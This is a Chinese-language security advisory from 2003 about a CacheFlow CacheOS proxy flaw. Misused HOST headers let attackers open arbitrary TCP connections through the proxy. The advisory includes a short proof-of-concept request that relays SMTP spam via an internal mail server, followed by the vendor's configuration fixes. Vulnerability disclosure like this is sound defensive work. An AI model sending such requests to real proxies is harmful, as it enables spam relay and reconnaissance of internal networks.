安全研究

安全漏洞
CacheFlow CacheOS HTTP HOST代理漏洞

发布日期:2003-09-10
更新日期:2003-09-18

受影响系统:
CacheFlow CacheOS 4.1.10016
描述:
BUGTRAQ  ID: 8584

Cache OS是一款应用于CacheFlow网络加速系列产品中的操作系统,由CacheFlow维护和开发。

Cache OS没有正确处理部分HTTP POST头字段,远程攻击者可以利用这个漏洞通过HTTP请求利用CacheOS进行任意TCP连接。

Cache OS支持HTTP CONNECT方法通过HTTP代理穿过非HTTP协议。HTTP代理一般使用CONNECT方法允许用户访问HTTPS站点等。由于Cache OS错误的使用HOST头字段数据,可导致攻击者利用这个方法连接内部邮件服务器,滥发邮件,或利用这个漏洞获得内部网络拓扑结构。

<*来源:Tim Kennedy (tim@timkennedy.net
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106322242900327&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Tim Kennedy (tim@timkennedy.net)提供了如下测试方法:

GET / HTTP/1.1
HOST: mailserver.example.com:25
HELO .
mail from: spammer@example.com
rcpt to: target@example.com
DATA
Subject: Look Ma! I'm an open relay
HI, you've been spammed through an open proxy, because of a bug in the
OS code. Have a Great Day!
-Spammer
.

建议:
厂商补丁:

CacheFlow
---------
CacheFlow提供如下解决方案:

CacheOS 4.0.x及以上的版本:

    cacheflow#conf t
    cacheflow#(config)services
    cacheflow#(config services)http
    cacheflow#(config services http)attribute connect ?
    enable Do NOT block CONNECT requests
    disable Do block CONNECT requests    

关闭使用CONNECT方法。

CacheOS 3.1.x及以上的版本:

    cacheflow#conf t
    cacheflow#(config)inline filter-list local ccc
    https://.*:(443|80) service=yes
    https://.*:[0-9]+/ service=no
    ccc

浏览次数:3334
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障